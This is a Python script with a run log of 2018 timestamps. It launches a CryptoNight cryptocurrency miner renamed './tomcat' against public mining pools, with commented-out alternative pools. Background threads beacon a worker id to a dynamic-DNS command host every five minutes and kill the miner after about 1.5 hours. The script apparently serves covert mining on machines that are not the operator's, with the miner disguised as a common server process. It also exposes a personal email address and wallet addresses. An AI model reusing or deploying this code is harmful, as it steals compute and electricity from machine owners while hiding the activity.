import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:45:03.338944
#2018-02-17 16:33:05.645961
#2018-02-17 18:21:01.976844
#2018-02-17 20:09:03.907979
#2018-02-17 21:56:07.779515
#2018-02-17 23:41:01.541696
#2018-02-18 01:29:05.667473
#2018-02-18 03:16:06.794338
#2018-02-18 05:05:07.387709
#2018-02-18 06:57:04.109184
#2018-02-18 08:45:08.569389
#2018-02-18 10:32:02.105685
#2018-02-18 12:17:01.506660
#2018-02-18 14:03:07.212948
#2018-02-18 15:53:04.777645
#2018-02-18 17:43:03.896346
#2018-02-18 19:30:09.585139
#2018-02-18 21:15:05.391911
#2018-02-18 23:03:06.098088
#2018-02-19 00:50:04.413361
#2018-02-19 02:36:07.497245
#2018-02-19 04:22:07.578104
#2018-02-19 06:07:07.753441
#2018-02-19 07:55:08.427918
#2018-02-19 09:46:02.069408
#2018-02-19 11:36:05.654940
#2018-02-19 13:22:08.280847
#2018-02-19 15:11:03.990407
#2018-02-19 16:58:08.819914
#2018-02-19 18:45:11.106912
#2018-02-19 20:35:10.254468
#2018-02-19 22:22:06.653961
#2018-02-20 00:08:08.039625
#2018-02-20 01:55:05.032377
#2018-02-20 03:43:08.920204
#2018-02-20 05:28:05.346050
#2018-02-20 07:12:07.056764
#2018-02-20 08:58:01.955094
#2018-02-20 10:41:07.313383
#2018-02-20 12:27:04.240557
#2018-02-20 14:14:08.937446
#2018-02-20 15:59:02.146094
#2018-02-20 17:45:12.749868
#2018-02-20 19:37:05.848541
#2018-02-20 21:26:01.815802
#2018-02-20 23:09:03.899905
#2018-02-21 00:52:05.469388
#2018-02-21 02:39:01.497981
#2018-02-21 04:28:01.961610
#2018-02-21 06:15:09.788257
#2018-02-21 08:01:01.996211
#2018-02-21 09:46:08.170859
#2018-02-21 11:35:04.006787
#2018-02-21 13:24:05.800569
#2018-02-21 15:09:02.154766
#2018-02-21 16:58:06.637051
#2018-02-21 18:45:04.540930
#2018-02-21 20:42:01.720685
#2018-02-21 22:26:06.671028
#2018-02-22 00:16:03.992038
#2018-02-22 02:04:06.301892
#2018-02-22 03:50:03.438793
#2018-02-22 05:37:01.908054
#2018-02-22 07:22:06.019853
#2018-02-22 09:10:05.334331
#2018-02-22 10:57:07.272381
#2018-02-22 12:43:08.980615
#2018-02-22 14:29:08.738652
#2018-02-22 16:17:05.134432
#2018-02-22 18:04:09.058699
#2018-02-22 19:54:12.958315
#2018-02-22 21:44:08.464427
#2018-02-22 23:33:08.468095
#2018-02-23 01:21:08.001905
#2018-02-23 03:07:07.022168
#2018-02-23 04:55:06.688308
#2018-02-23 06:41:04.432592
#2018-02-23 08:29:07.752360
#2018-02-23 10:44:07.600811
#2018-02-23 12:41:07.690839
#2018-02-23 14:26:07.057813
#2018-02-23 16:17:07.068013
#2018-02-23 18:02:10.470972
#2018-02-23 19:47:03.528608
#2018-02-23 21:31:07.069923
#2018-02-23 23:19:06.645699
#2018-02-24 01:08:05.097415
#2018-02-24 02:59:06.251666
#2018-02-24 03:00:54.593904
#2018-02-24 04:47:03.896180
#2018-02-24 06:18:05.125834
#2018-02-24 07:55:07.644615
#2018-02-24 09:26:01.778195
#2018-02-24 11:04:01.751569
#2018-02-24 12:39:03.611593
#2018-02-24 14:17:04.134112
#2018-02-24 15:50:06.435053
#2018-02-24 17:26:03.914908
#2018-02-24 18:56:03.997919
#2018-02-24 20:29:07.308223
#2018-02-24 22:02:06.083788
#2018-02-25 00:46:05.524317
#2018-02-25 03:52:05.371362
#2018-02-25 07:24:06.006980